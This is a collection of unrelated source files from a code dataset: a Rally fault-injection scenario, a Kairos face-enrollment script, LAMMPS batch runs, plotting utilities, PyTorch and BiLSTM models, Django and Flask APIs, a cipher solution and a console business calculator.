+{"seq_id":"394346186","text":"import base_disaster_scenario\nfrom rally.benchmark.scenarios import base\n\n\nclass BaseDisasterScenario(base_disaster_scenario.BaseDisasterScenario):\n\n @base.scenario()\n def test_scenario_1(self):\n self.run_disaster_command(self.context[\"controllers\"][0],\n \"stop rabbitmq service\")\n\n ## need to extend it\n self.boot_vm()","sub_path":"rally-scenarios/rabbitmq_disaster_scenarios.py","file_name":"rabbitmq_disaster_scenarios.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"196958799","text":"\n# This script is run automatically when motion is detected\n# Store this file at /etc/motion/motion_handler.py\n\nimport base64\nimport requests\nimport configparser\n\n# Get API keys and metadata from config file.\nconfig = configparser.RawConfigParser()\nconfig.read('/etc/motion/api_keys.cfg')\napp_id = config.get('KairosData', 'app_id')\napp_key = config.get('KairosData', 'app_key')\ngallery_name = config.get('KairosData', 'gallery_name')\n\n# image_filename is the path to the image you want to enroll\nimage_filename = config.get('KairosData', 'image_filename')\n\n# subject_id is the ID for the face being enrolled\nsubject_id = config.get('KairosData', 'subject_id')\n\nimage_file = open(image_filename, \"rb\")\nimage = base64.b64encode(image_file.read()).decode(\"ascii\")\nimage_file.close()\n\nvalues = {\n \"image\": image,\n \"subject_id\": subject_id,\n \"gallery_name\": gallery_name,\n}\n\nheaders = {\n 'Content-Type': 'application/json',\n 'app_id': app_id,\n 'app_key': app_key\n}\n\nresponse = requests.post('https://api.kairos.com/enroll', json=values, headers=headers).json()\n\nprint(response)","sub_path":"utils/enroll_image.py","file_name":"enroll_image.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"539580902","text":"# create_runs.py\n# Script that compiles and executes .cpp files\n# Usage:\n# python create_runs.py (without .cpp extension)\n\nimport sys, os, getopt, re \nimport shutil\ndef main():\n run_dir = '/home/student/Desktop/Shira_Michal/before_ delete/8_16'\n params_file = open('{}/nvt_BB_real/Extra_Potential_Parameters.txt'.format(run_dir), 'r')\n lines = params_file.readlines()\n f1_vals = lines[19]\n f1_vals = f1_vals.split(\",\")\n f2_vals = lines[21]\n f2_vals = f2_vals.split(\",\")\n params_file.close()\n f1_vals = range(int(f1_vals[0]), int(f1_vals[1]), int(f1_vals[2]))# range(50, 151, 50)\n f2_vals = float(f2_vals[0])# range(0.75,1,1)\n\t# 3 steps of run\n suffixes = [('min', 'min'),\n ('nvt_1', 'nvt'),\n ('nvt_BB_real', 'nvt')]\n for f11 in f1_vals:\n for f12 in f1_vals:\n #for f13 in f1_vals:\n for f14 in f1_vals:\n if (True): #(f11 == 50 and f12 == 100 and f14 == 150): \t# for case of run only one combination\n print ('------------------------------ f11, f12, f14:', f11, f12,0, f14)\n ############################# update the f1, f2 params in the file #################################\n params_file = open('{}/nvt_BB_real/Extra_Potential_Parameters.txt'.format(run_dir), 'r')\n lines = params_file.readlines()\n params_file.close()\n params_file = open('{}/nvt_BB_real/Extra_Potential_Parameters.txt'.format(run_dir), 'w')\n mult = []\n mult.append(f11)\n mult.append(f12)\n mult.append(0)#f13)\n mult.append(f14)\n for line_num, (line, f1) in enumerate(zip(lines[14:], mult)):\n data = line.split()\n data[2] = str(f1)\n data[3] = str(f2_vals)\n if line_num == 2:\n data[3] = str(0)\n lines[line_num+14] = ' '.join(data) + '\\n'\n params_file.writelines(lines)\n params_file.close()\n ###################################################################################################\n ########################################## runs 3 levels ##########################################\n for suffix, exe_file in suffixes:\n if True: # suffix == 'nvt_BB_real': #just for the first time you run the program on this size of run(2-4, 8-18, 16-32...) 
you need the True else use the 'nvt_BB_real' condition\n curr_dir = '{}/{}'.format(run_dir, suffix)\n # cmd = '/home/student/lammps/src/lmp_serial < in.{}'.format(exe_file)\n cmd = 'OMP_NUM_THREADS=4 /home/student/lammps/src/lmp_omp -sf omp < in.{}'.format(exe_file)\n out_file = 'res_{}.txt'.format(exe_file)\n run(curr_dir, cmd, out_file) # do cd + run in.suffix\n ###################################################################################################\n ################################ save results of nvt__BB run ######################################\n inputFile_t = str('{}/nvt_BB_real/species.out'.format(run_dir))\n all_species = str('{}/nvt_BB_real/all_results_for_f1_f2/'.format(run_dir))+'species'+str(f11)+\"_\"+ str(f12)+ \"_\"+str(0)+ \"_\"+str(f14)+'.txt'\n shutil.copy2(inputFile_t, all_species)\n inputFile_t = str('{}/nvt_BB_real/bonds.reax'.format(run_dir))\n all_species = str('{}/nvt_BB_real/all_results_for_f1_f2/'.format(run_dir)) + 'bonds' + str(f11) + \"_\" + str(f12) + \"_\" + str(0) + \"_\" + str(f14) + '.reax'\n shutil.copy2(inputFile_t, all_species)\n\n ###################################################################################################\n print(\"complited\")\n\ndef run(dir, cmd, out_file):\n\t# this func execute cpp functions\n os.chdir(dir)\n os.system(\"echo do cd to \" + os.getcwd())\n os.system(\"echo Running \" + cmd)\n os.system('{} > {}'.format(cmd, out_file))\n os.system(\"echo -------------------\")\n\nif __name__=='__main__':\n main()\n","sub_path":"python code/create_runs.py","file_name":"create_runs.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"207556272","text":"# Import pyplot\nimport matplotlib.pyplot as plt\n# Import pandas\nimport pandas as pd\n\n# Import dataset\ndf = pd.read_csv('../datasets/weather_data_austin_2010.csv', nrows=1000);\n\n# Change columns names\ndf.rename(columns={'Temperature': 'Temperature (deg F)', 'DewPoint': 'Dew Point (deg F)'}, inplace=True)\n\n# Plot all columns (default)\ndf.plot()\nplt.show()\n\n# Plot all columns as subplots\ndf.plot(subplots=True)\nplt.show()\n\n# Plot just the Dew Point data\ncolumn_list1 = ['Dew Point (deg F)']\ndf[column_list1].plot()\nplt.show()\n\n# Plot the Dew Point and Temperature data, but not the Pressure data\ncolumn_list2 = ['Temperature (deg F)','Dew Point (deg F)']\ndf[column_list2].plot()\nplt.show()","sub_path":"plotting-dataframes-pandas/plotting-dataframes-pandas.py","file_name":"plotting-dataframes-pandas.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"604838389","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport colour\n\nfrom sklearn.metrics import r2_score\n\n\ndef compare_param_dist(param_raw, param_pred):\n len_param = len(param_raw)\n category = (['height'] * len_param + ['gap'] * len_param + ['period'] * len_param + ['diameter'] * len_param) * 2\n param_raw = param_raw.T.reshape(-1)\n param_pred = param_pred.T.reshape(-1)\n type = ['raw'] * len(param_pred) + ['pred'] * len(param_pred)\n res_df = pd.DataFrame({'val':np.concatenate((param_raw, param_pred)), 'cat':category, 'type':type})\n sns.boxplot(x='cat', y='val', data=res_df, hue='type')\n\ndef compare_cie_dist(cie_raw, cie_pred):\n len_cie = len(cie_raw)\n category = (['x'] * len_cie + ['y'] * len_cie + ['Y'] * len_cie) * 2\n cie_raw = cie_raw.T.reshape(-1)\n cie_pred = cie_pred.T.reshape(-1)\n type = ['raw'] * len(cie_pred) + ['pred'] * len(cie_pred)\n res_df = pd.DataFrame({'val':np.concatenate((cie_raw, cie_pred)), 'cat':category, 'type':type})\n sns.boxplot(x='cat', y='val', data=res_df, hue='type')\n\ndef plot_cie(cie_raw, cie_pred):\n from colour.plotting import plot_chromaticity_diagram_CIE1931\n from matplotlib.patches import Polygon\n\n fig, ax = plot_chromaticity_diagram_CIE1931()\n srgb = Polygon(list(zip([0.64, 0.3, 0.15], [0.33, 0.6, 0.06])), facecolor='0.9', alpha=0.1, edgecolor='k')\n ax.add_patch(srgb)\n ax.scatter(cie_raw[:,0], cie_raw[:,1], s=1, c='b')\n ax.scatter(cie_pred[:,0], cie_pred[:,1], s=1, c='k')\n return fig\n\ndef plot_cie_raw_pred(cie_raw, cie_pred):\n fig, ax = plt.subplots(1, 3, figsize=(10, 3))\n titles = ['x', 'y', 'Y']\n for i in range(3):\n raw_pred = np.array(sorted(zip(cie_raw[:, i], cie_pred[:, i])))\n ax[i].scatter(raw_pred[:, 0], raw_pred[:, 1])\n ax[i].plot([raw_pred[:,0].min(), raw_pred[:,0].max()], [raw_pred[:,1].min(), raw_pred[:,1].max()], c='k')\n ax[i].set_title(titles[i] + ' (r2 score = {:.3f})'.format(r2_score(raw_pred[:, 0], raw_pred[:, 1])))\n ax[i].set_xlabel('ground truth')\n ax[i].set_ylabel('predicted')","sub_path":"Model/plotting_utils.py","file_name":"plotting_utils.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"636787421","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), os.path.pardir))\n\nfrom data_process.util import savebest_checkpoint, load_checkpoint,plot_all_epoch,plot_xfit, os_makedirs\n\nimport numpy as np\n\nfrom sklearn.metrics import mean_squared_error\n\nfrom tqdm import trange\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import PackedSequence\nimport torch.optim as optim\n\n\n\nclass MLP(nn.Module):\n def __init__(self, params=None, logger=None):\n super().__init__()\n self.params = params\n self.logger = logger\n\n timesteps, output_dim, hidden_size = params.steps, params.H, params.hidden_size\n\n self.Input_dim = timesteps\n self.Output_dim = output_dim\n self.Hidden_Size = hidden_size\n\n self.num_epochs = self.params.num_epochs\n\n self.hidden = nn.Linear(self.Input_dim,self.Hidden_Size)\n self.fc = nn.Linear(self.Hidden_Size,self.Output_dim)\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=params.learning_rate)\n self.epoch_scheduler = torch.optim.lr_scheduler.StepLR(\n self.optimizer, params.step_lr, gamma=0.9)\n self.loss_fn = nn.MSELoss()\n\n self.params.plot_dir = os.path.join(params.model_dir, 'figures')\n # create missing directories\n os_makedirs(self.params.plot_dir)\n\n if self.params.device == torch.device('cpu'):\n self.logger.info('Not using cuda...')\n else:\n self.logger.info('Using Cuda...')\n self.to(self.params.device)\n\n\n def forward(self, input):\n input = input[:,:,0]\n h=self.hidden(input)\n h=torch.sigmoid(h)\n pred =self.fc(h)\n return pred\n\n self.Input_dim = input_dim\n self.Output_dim = output_dim\n self.Hidden_Size = hidden_size\n\n self.Num_iters = num_iters\n self.Optim_method = optim_method\n self.Learn_rate = learning_rate\n self.plot_ = plot_\n self.device = device\n\n self.verbose = True\n\n\n def xfit(self, train_loader, val_loader, restore_file=None):\n # update self.params\n if restore_file is not None and os.path.exists(restore_file) and self.params.restore:\n self.logger.info(\n 'Restoring parameters from {}'.format(restore_file))\n load_checkpoint(restore_file, self, self.optimizer)\n\n min_vmse = 9999\n train_len = len(train_loader)\n loss_summary = np.zeros((train_len * self.num_epochs))\n loss_avg = np.zeros((self.num_epochs))\n vloss_avg = np.zeros_like(loss_avg)\n\n epoch = 0\n for epoch in trange(self.num_epochs):\n # self.logger.info(\n # 'Epoch {}/{}'.format(epoch + 1, self.num_epochs))\n mse_train = 0\n loss_epoch = np.zeros(train_len)\n for i, (batch_x, batch_y) in enumerate(train_loader):\n batch_x = batch_x.to(torch.float32).to(self.params.device)\n batch_y = batch_y.to(torch.float32).to(self.params.device)\n self.optimizer.zero_grad()\n y_pred = self(batch_x)\n # y_pred = y_pred.squeeze(1)\n loss = self.loss_fn(y_pred, batch_y)\n loss.backward()\n mse_train += loss.item()\n loss_epoch[i] = loss.item()\n self.optimizer.step()\n \n mse_train = mse_train / train_len\n loss_summary[epoch * train_len:(epoch + 1) * train_len] = loss_epoch\n loss_avg[epoch] = mse_train\n\n self.epoch_scheduler.step()\n \n with torch.no_grad():\n mse_val = 0\n preds = []\n true = []\n for batch_x, batch_y in val_loader:\n batch_x = batch_x.to(torch.float32).to(self.params.device)\n batch_y = batch_y.to(torch.float32).to(self.params.device)\n output = self(batch_x)\n # output = output.squeeze(1)\n preds.append(output.detach().cpu().numpy())\n true.append(batch_y.detach().cpu().numpy())\n mse_val += self.loss_fn(output,\n batch_y).item()\n mse_val = mse_val / 
len(val_loader)\n vloss_avg[epoch] = mse_val\n\n preds = np.concatenate(preds)\n true = np.concatenate(true)\n\n # self.logger.info('Current training loss: {:.4f} \\t validating loss: {:.4f}'.format(mse_train,mse_val))\n \n vmse = mean_squared_error(true, preds)\n # self.logger.info('Current vmse: {:.4f}'.format(vmse))\n if vmse < min_vmse:\n min_vmse = vmse\n # self.logger.info('Found new best state')\n savebest_checkpoint({\n 'epoch': epoch,\n 'cv': self.params.cv,\n 'state_dict': self.state_dict(),\n 'optim_dict': self.optimizer.state_dict()}, checkpoint=self.params.model_dir)\n # self.logger.info(\n # 'Checkpoint saved to {}'.format(self.params.model_dir)) \n # self.logger.info('Best vmse: {:.4f}'.format(min_vmse))\n\n plot_all_epoch(loss_summary[:(\n epoch + 1) * train_len], self.params.dataset + '_loss_cv{}'.format(self.params.cv), self.params.plot_dir)\n plot_xfit(loss_avg,vloss_avg,self.params.dataset + '_loss_cv{}'.format(self.params.cv), self.params.plot_dir)\n\n def predict(self, x, using_best=True):\n '''\n x: (numpy.narray) shape: [sample, full-len, dim]\n return: (numpy.narray) shape: [sample, prediction-len]\n '''\n # test_batch: shape: [full-len, sample, dim]\n best_pth = os.path.join(self.params.model_dir, 'best.cv{}.pth.tar'.format(self.params.cv))\n if os.path.exists(best_pth) and using_best:\n # self.logger.info('Restoring best parameters from {}'.format(best_pth))\n load_checkpoint(best_pth, self, self.optimizer)\n\n x = torch.tensor(x).to(torch.float32).to(self.params.device)\n output = self(x)\n # output = output.squeeze(1)\n pred = output.detach().cpu().numpy()\n\n return pred","sub_path":"models/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"455821610","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\n\ndef read(fname):\n with open(fname, 'r') as fr:\n return fr.read()\n \nsetup(\n description='Robot word search game',\n packages=['wskit','wskit.bots'],\n long_description=read('README.rst'),\n entry_points={'console_scripts':['wordseek = wskit.wordseek:run']},\n name='wordseek',\n license='MIT',\n author='David Hacker',\n author_email='dmhacker@yahoo.com',\n url='https://github.com/dmhacker/wordseek',\n package_data={'wskit':['*.py']},\n version='1.0.8',\n install_requires=[\n 'colorama',\n ],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"541216478","text":"# https://www.hackerrank.com/challenges/cipher/problem\n\nn, k = map(int, input().split())\ns = input()\nl = len(s)\ndecoded = [0 for i in range(l)]\n# The first digit is not XOR with anything\ndecoded[0] = int(s[0])\n# Complexity: O(len(s))\nfor i in range(1, l):\n # To guess the digit at i, \n # We know that decoded[i - 2] ^ decoded[i - 1] ^ decoded[i] = s[i]\n # when decoded[i - 2] ^ decoded[i - 1] = s[i - 1]\n # Therefore to generalize, s[i - 1] ^ decoded[i] = s[i]\n # This is equivalent to decoded[i] = s[i - 1] ^ s[i]\n\n decoded[i] = int(s[i - 1]) ^ int(s[i])\n # When i >= k, there is no longer shifting, and if we \n # follow the same formula, there would be a redundant XOR with decoded[i - k]\n # therefore, we do another XOR with decoded[i - k] to balance this out (0)\n if i >= k:\n decoded[i] = decoded[i] ^ decoded[i - k]\n\nres = \"\".join([str(x) for x in decoded[: l - k + 1]])\nprint(res)\n\n\n\n","sub_path":"hackerrank/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"8833329","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom highway import HighwayMLP\nfrom attention import Attention\nfrom attention import BiAFAttention\nfrom tree_lstm import ChildSumTreeLSTM\nfrom utils import create_trees\nfrom syntactic_gcn import SyntacticGCN\nfrom sa_lstm import SyntaxAwareLSTM\nfrom rcnn import RCNN\nfrom bert import BertEmbedder\n\nfrom utils import USE_CUDA\nfrom utils import get_torch_variable_from_np, get_data\n\n\nclass End2EndModel(nn.Module):\n def __init__(self, model_params):\n super(End2EndModel,self).__init__()\n\n self.model_name = model_params['model_name']\n self.dropout = model_params['dropout']\n self.batch_size = model_params['batch_size']\n\n if self.model_name == 'bert-base-multilingual-cased':\n self.word_encoder = BertEmbedder(self.model_name)\n elif self.model_name == 'xlm-mlm-tlm-xnli15-1024':\n self.word_encoder = BertEmbedder(self.model_name)\n else:\n None\n\n # self.word_vocab_size = model_params['word_vocab_size']\n # self.lemma_vocab_size = model_params['lemma_vocab_size']\n # self.pos_vocab_size = model_params['pos_vocab_size']\n self.deprel_vocab_size = model_params['deprel_vocab_size']\n # self.pretrain_vocab_size = model_params['pretrain_vocab_size']\n\n # self.word_emb_size = model_params['word_emb_size']\n # self.lemma_emb_size = model_params['lemma_emb_size']\n # self.pos_emb_size = model_params['pos_emb_size']\n \n self.use_deprel = model_params['use_deprel']\n self.deprel_emb_size = model_params['deprel_emb_size']\n \n # self.pretrain_emb_size = model_params['pretrain_emb_size']\n # self.pretrain_emb_weight = model_params['pretrain_emb_weight']\n\n self.bilstm_num_layers = model_params['bilstm_num_layers']\n self.bilstm_hidden_size = model_params['bilstm_hidden_size']\n\n self.target_vocab_size = model_params['target_vocab_size']\n \n self.use_flag_embedding = model_params['use_flag_embedding']\n self.flag_emb_size = model_params['flag_embedding_size']\n\n self.deprel2idx = model_params['deprel2idx']\n\n if self.use_flag_embedding:\n self.flag_embedding = nn.Embedding(2, self.flag_emb_size)\n self.flag_embedding.weight.data.uniform_(-1.0,1.0)\n\n # self.word_embedding = nn.Embedding(self.word_vocab_size, self.word_emb_size)\n # self.word_embedding.weight.data.uniform_(-1.0,1.0)\n #\n # self.lemma_embedding = nn.Embedding(self.lemma_vocab_size, self.lemma_emb_size)\n # self.lemma_embedding.weight.data.uniform_(-1.0,1.0)\n #\n # self.pos_embedding = nn.Embedding(self.pos_vocab_size, self.pos_emb_size)\n # self.pos_embedding.weight.data.uniform_(-1.0,1.0)\n\n if self.use_deprel:\n self.deprel_embedding = nn.Embedding(self.deprel_vocab_size, self.deprel_emb_size)\n self.deprel_embedding.weight.data.uniform_(-1.0,1.0)\n\n # self.pretrained_embedding = nn.Embedding(self.pretrain_vocab_size,self.pretrain_emb_size)\n # self.pretrained_embedding.weight.data.copy_(torch.from_numpy(self.pretrain_emb_weight))\n\n if self.model_name == 'bert-base-multilingual-cased':\n input_emb_size = 768\n elif self.model_name == 'xlm-mlm-tlm-xnli15-1024':\n input_emb_size = 1024\n else:\n input_emb_size = 512\n\n if self.use_flag_embedding:\n input_emb_size += self.flag_emb_size\n else:\n input_emb_size += 1\n\n if self.use_deprel:\n input_emb_size += self.deprel_emb_size #\n # else:\n # input_emb_size += self.pretrain_emb_size + self.word_emb_size + self.lemma_emb_size + self.pos_emb_size\n\n\n # if USE_CUDA:\n # self.bilstm_hidden_state0 = 
(Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True).cuda(),\n # Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True).cuda())\n # else:\n # self.bilstm_hidden_state0 = (Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True),\n # Variable(torch.randn(2 * self.bilstm_num_layers, self.batch_size, self.bilstm_hidden_size),requires_grad=True))\n\n\n self.bilstm_layer = nn.LSTM(input_size=input_emb_size,\n hidden_size = self.bilstm_hidden_size, num_layers = self.bilstm_num_layers,\n dropout = self.dropout, bidirectional = True,\n bias = True, batch_first=True)\n\n self.use_highway = model_params['use_highway']\n self.highway_layers = model_params['highway_layers']\n if self.use_highway:\n self.highway_layers = nn.ModuleList([HighwayMLP(self.bilstm_hidden_size*2, activation_function=F.relu)\n for _ in range(self.highway_layers)])\n\n self.output_layer = nn.Linear(self.bilstm_hidden_size*2, self.target_vocab_size)\n else:\n self.output_layer = nn.Linear(self.bilstm_hidden_size*2,self.target_vocab_size)\n\n\n def softmax(self,input, axis=1):\n \"\"\"\n Softmax applied to axis=n\n \n Args:\n input: {Tensor,Variable} input on which softmax is to be applied\n axis : {int} axis on which softmax is to be applied\n \n Returns:\n softmaxed tensors\n \n \"\"\"\n \n input_size = input.size()\n trans_input = input.transpose(axis, len(input_size)-1)\n trans_size = trans_input.size()\n input_2d = trans_input.contiguous().view(-1, trans_size[-1])\n soft_max_2d = F.softmax(input_2d)\n soft_max_nd = soft_max_2d.view(*trans_size)\n return soft_max_nd.transpose(axis, len(input_size)-1)\n \n\n def forward(self, batch_input):\n \n flag_batch = get_torch_variable_from_np(batch_input['flag'])\n word_batch = get_torch_variable_from_np(batch_input['word']).long()\n word_lens_batch = get_torch_variable_from_np(batch_input['word_lens'])\n # lemma_batch = get_torch_variable_from_np(batch_input['lemma'])\n # pos_batch = get_torch_variable_from_np(batch_input['pos'])\n deprel_batch = get_torch_variable_from_np(batch_input['deprel'])\n # pretrain_batch = get_torch_variable_from_np(batch_input['pretrain'])\n # predicate_batch = get_torch_variable_from_np(batch_input['predicate'])\n # predicate_pretrain_batch = get_torch_variable_from_np(batch_input['predicate_pretrain'])\n origin_batch = batch_input['origin']\n origin_deprel_batch = batch_input['deprel']\n\n if self.use_flag_embedding:\n flag_emb = self.flag_embedding(flag_batch)\n else:\n flag_emb = flag_batch.view(flag_batch.shape[0],flag_batch.shape[1], 1).float()\n \n word_emb = self.word_encoder(word_batch, word_lens_batch)\n # lemma_emb = self.lemma_embedding(lemma_batch)\n # pos_emb = self.pos_embedding(pos_batch)\n # pretrain_emb = self.pretrained_embedding(pretrain_batch)\n\n if self.use_deprel:\n deprel_emb = self.deprel_embedding(deprel_batch)\n\n # predicate_emb = self.word_embedding(predicate_batch)\n # predicate_pretrain_emb = self.pretrained_embedding(predicate_pretrain_batch)\n\n if self.use_deprel:\n input_emb = torch.cat([flag_emb, word_emb, deprel_emb], 2) #\n else:\n input_emb = torch.cat([flag_emb, word_emb], 2) #\n\n\n\n ##############################################\n # PLACE EMBEDDERS HERE\n ##############################################\n\n bilstm_output, (_, bilstm_final_state) = self.bilstm_layer(input_emb) #,self.bilstm_hidden_state0)\n\n\n\n bilstm_output = 
bilstm_output.contiguous()\n\n #print(hidden_input.shape)\n\n hidden_input = bilstm_output.view(bilstm_output.shape[0]*bilstm_output.shape[1],-1)\n\n if self.use_highway:\n for current_layer in self.highway_layers:\n hidden_input = current_layer(hidden_input)\n\n output = self.output_layer(hidden_input)\n else:\n output = self.output_layer(hidden_input)\n return output\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"324376580","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom rest_framework import viewsets, mixins\nfrom .serializers import *\nfrom .filters import ServerFilter\n\n\nclass ServerAutoReportViewset(mixins.CreateModelMixin,\n viewsets.GenericViewSet,\n ):\n \"\"\"\n create:\n 创建服务器记录\n \"\"\"\n queryset = Server.objects.all()\n serializer_class = ServerAutoReportSerializer\n\nclass ServerViewset(viewsets.ReadOnlyModelViewSet,\n ):\n \"\"\"\n retrieve:\n 返回指定服务器信息\n list:\n 返回服务器列表\n \"\"\"\n queryset = Server.objects.all()\n serializer_class = ServerSerializer\n # filter_backends = (DjangoFilterBackend,)\n filter_class = ServerFilter\n\n\nclass NetworkDeviceViewset(viewsets.ReadOnlyModelViewSet,\n ):\n \"\"\"\n retrieve:\n 返回指定网卡信息\n list:\n 返回网卡列表\n \"\"\"\n queryset = NetworkDevice.objects.all()\n serializer_class = NetWorkDeivceSerializer\n\n\nclass IPViewset(viewsets.ReadOnlyModelViewSet,\n ):\n \"\"\"\n retrieve:\n 返回指定IP信息\n list:\n 返回IP列表\n \"\"\"\n queryset = IP.objects.all()\n serializer_class = IPSerializer\n","sub_path":"apps/servers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"66040083","text":"###############################################################################\n# Author: Daniil Budanov\n# Contact: danbudanov@gmail.com\n# Summer Internship - 2016\n###############################################################################\n# Title: main.py\n# Project: Romeo Robot\n# Description:\n# - Instantiates server\n# - creates routes for API\n# - runs server\n# Last Modified: 7.13.2016\n###############################################################################\nfrom robot import *\n\n# instantiate Flask server\napp = Flask(__name__)\napi = Api(app)\n\n# create routes for Flask API\napi.add_resource(Start, '/actions/start')\napi.add_resource(Stop, '/actions/stop')\napi.add_resource(LongTurn, '/actions/longturn')\napi.add_resource(PointTurn, '/actions/pointturn')\napi.add_resource(Wheels, '/actions/wheels/')\napi.add_resource(Forward, '/actions/forward', '/actions/forwards')\napi.add_resource(Path, '/paths/administer/', '/paths/administer')\napi.add_resource(ExecutePath, '/paths/execute/')\n\n# Run flask server\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000) # host makes server accessible on network\n","sub_path":"romeo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"239069259","text":"import time\nexit = 0\ndef bc():\n total= {\n 'cost_V':24.54,\n 'sell_V':29.55,\n 'ss':243\n }\n print('[Current]\\n\\ncost:', total['cost_V'], '\\b$')\n print('sell price:', total['sell_V'], '\\b$')\n print('Stock:', total['ss'])\n print(' \\n\\n')\n time.sleep(1)\n while True:\n while True:\n try:\n stock = int(input('Enter stock to be sold:'))\n total['ss'] = stock\n del stock\n time.sleep(0.4)\n break\n except ValueError:\n time.sleep(0.25)\n print('\\n[Error]:\\nenter a full number\\n')\n time.sleep(0.5)\n continue\n while True:\n try:\n change = str(input('\\nChange cost or sell value?(y/n):'))\n time.sleep(0.3)\n if change == 'y':\n while True:\n try:\n c = float(input('\\nNew cost per stock:'))\n time.sleep(0.2)\n except ValueError:\n print('Enter a valid price (a real number)\\n')\n time.sleep(0.2)\n continue\n break\n while True:\n try:\n d = float(input('New sell price per stock:'))\n time.sleep(0.2)\n except ValueError:\n print('Enter a valid price (a real number)\\n')\n time.sleep(0.2)\n continue\n total['cost_V'] = c\n total['sell_V'] = d\n del change, c, d\n break\n break\n elif change == 'n':\n time.sleep(1)\n del change\n break\n else:\n print('I only understand yes or no (\"y\" or \"n\")')\n continue\n except ValueError:\n print('Please use \"y\" for yes or \"n\" for no')\n time.sleep(0.3)\n continue\n print()\n print('calculating',end='\\r')\n b = (total['sell_V']*total['ss'])-(total['cost_V']*total['ss'])\n time.sleep(0.2)\n print('calculating.',end='\\r')\n c = round(b)\n time.sleep(0.2)\n print('calculating..',end='\\r')\n c = int(c)\n time.sleep(0.2)\n print('calculating...\\n')\n time.sleep(0.5)\n print('[Profit]\\n\\nGains: ', c,'\\b$\\nAccurate Gains:', b,'\\b$\\n\\n\\n\\n\\n')\n inpt = str(input('Again?(y/n)'))\n if inpt == 'y':\n time.sleep(0.05)\n continue\n elif inpt == 'n':\n break\n else:\n print('Use \"y\" for yes and \"n\" for no')\n time.sleep(0.2)\ndef p():\n while True:\n while True:\n try:\n print()\n inpt = float(input('Input Money:'))\n break\n except ValueError:\n print('Invalid Input')\n time.sleep(0.1)\n continue\n print()\n print('[Converted]\\n$%.2f' %(inpt))\n inpt = str(input('Again?(y/n)'))\n if inpt == 'y':\n time.sleep(0.05)\n continue\n elif inpt == 'n':\n break\n else:\n print('Use \"y\" for yes and \"n\" for no')\n time.sleep(0.2)\nwhile True:\n if exit > 0:\n exit = 0\n break\n change = str(input('[Main Menu]\\nBusinesss_Calculation[bc] or Payrolls[p]?:'))\n time.sleep(0.3)\n if change == 'bc':\n time.sleep(0.2)\n print('\\nOpening Business Calculation [Task 1]\\n\\n')\n time.sleep(0.7)\n bc()#Opens business calculation\n while True:\n change = str(input('Exit[e] or Main Menu[mm]?'))\n print()\n if change == 'e':\n print('[Exitting]')\n time.sleep(1)\n exit = 1\n break\n elif change == 'mm':\n time.sleep(0.3)\n break\n else:\n print('Use \"e\" for Exit or \"mm\" for Main Menu')\n print()\n time.sleep(0.2)\n continue\n elif change == 'p':\n time.sleep(0.2)\n print('\\nOpening Payrolls [Task 2]\\n\\n')\n time.sleep(0.7)\n p()#Opens payrolls\n while True:\n change = str(input('Exit[e] or Main Menu[mm]?'))\n print()\n if change == 'e':\n print('[Exitting]')\n time.sleep(1)\n exit = 1\n break\n elif change == 'mm':\n time.sleep(0.3)\n break\n else:\n print('Use \"e\" for Exit or \"mm\" for Main Menu')\n print()\n time.sleep(0.2)\n continue\n else:\n print('Can only receive Business_Calculation and Payrolls (\"bc\" or \"p\")\\n')\n time.sleep(0.6)\n continue","sub_path":"Assignment_7 Efsane 
Çözüm.py","file_name":"Assignment_7 Efsane Çözüm.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
